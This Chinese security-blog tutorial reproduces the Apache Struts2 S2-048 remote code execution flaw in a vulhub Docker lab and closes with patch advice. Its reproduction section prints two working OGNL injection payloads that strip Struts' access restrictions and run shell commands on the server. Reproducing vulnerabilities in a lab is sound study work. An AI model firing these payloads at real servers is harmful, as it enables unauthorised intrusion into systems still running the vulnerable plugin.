Apache Struts2–048远程代码执行漏洞复现 – 作者:东塔安全学院

0x00简介

Struts2框架是一个用于开发Java EE网络应用程序的开放源代码网页应用程序架构。它利用并延伸了Java Servlet API,鼓励开发者采用MVC架构。Struts2以WebWork优秀的设计思想为核心,吸收了Struts框架的部分优点,提供了一个更加整洁的MVC设计模式实现的Web应用程序框架。

0x01漏洞概述

Apache Struts2 2.3.x 系列启用了struts2-struts1-plugin 插件并且存在 struts2-showcase 目录,其漏洞成因是当ActionMessage接收客户可控的参数数据时,由于后续数据拼接传递后处理不当导致任意代码执行

0x02影响范围

Apache Struts 2.3.x系列中启用了struts2-struts1-plugin插件的版本。

0x03环境搭建

1.自行搭建Apache Struts2较为复杂,本次漏洞环境使用vulhub中的docker环境搭建。

下载地址:https://github.com/vulhub/vulhub

2.下载完成后解压进入s2-048目录,启动漏洞环境

cd cd vulhub-master/struts2/s2-048/    //进入目录

图片[1]-Apache Struts2–048远程代码执行漏洞复现 – 作者:东塔安全学院-安全小百科

docker-compose up -d  //启动靶场

图片[2]-Apache Struts2–048远程代码执行漏洞复现 – 作者:东塔安全学院-安全小百科

3.使用docker ps 查看是否启动成功

图片[3]-Apache Struts2–048远程代码执行漏洞复现 – 作者:东塔安全学院-安全小百科

4.在浏览器输入http:your-ip:8080/hello.action,看到以下页面环境搭建完成

图片[4]-Apache Struts2–048远程代码执行漏洞复现 – 作者:东塔安全学院-安全小百科

0x04漏洞复现

1. 在浏览器输入以下链接访问漏洞页面

http://192.168.3.160:8080/integration/saveGangster.action

图片[5]-Apache Struts2–048远程代码执行漏洞复现 – 作者:东塔安全学院-安全小百科

2.在第一个表单“Gangster Name”处输入${1+1},下面随意输入,点击submit提交查看执行了OGNL 表达式

图片[6]-Apache Struts2–048远程代码执行漏洞复现 – 作者:东塔安全学院-安全小百科

图片[7]-Apache Struts2–048远程代码执行漏洞复现 – 作者:东塔安全学院-安全小百科

2. 在Gangster Name”处把${1+1}修改为以下命令执行的payload语句

%{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec(‘id’).getInputStream())).(#q)}

图片[8]-Apache Struts2–048远程代码执行漏洞复现 – 作者:东塔安全学院-安全小百科

图片[9]-Apache Struts2–048远程代码执行漏洞复现 – 作者:东塔安全学院-安全小百科

3. 也可以使用Burp抓包修改成命令执行的payload的语句

注:payload需要使用URL编码

%{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’id’).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

图片[10]-Apache Struts2–048远程代码执行漏洞复现 – 作者:东塔安全学院-安全小百科

图片[11]-Apache Struts2–048远程代码执行漏洞复现 – 作者:东塔安全学院-安全小百科

4. 可以使用自动化脚本或图形化工具实现,这里不做演示。

工具可在GitHub上搜索下载

0x05修复建议

1. 升级 建议升级到最新版本

2、根据业务情况,禁用关闭(删除) \struts-2.3.x\apps\struts2-showcase.war包

来源:freebuf.com 2020-12-28 18:01:15 by: 东塔安全学院

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论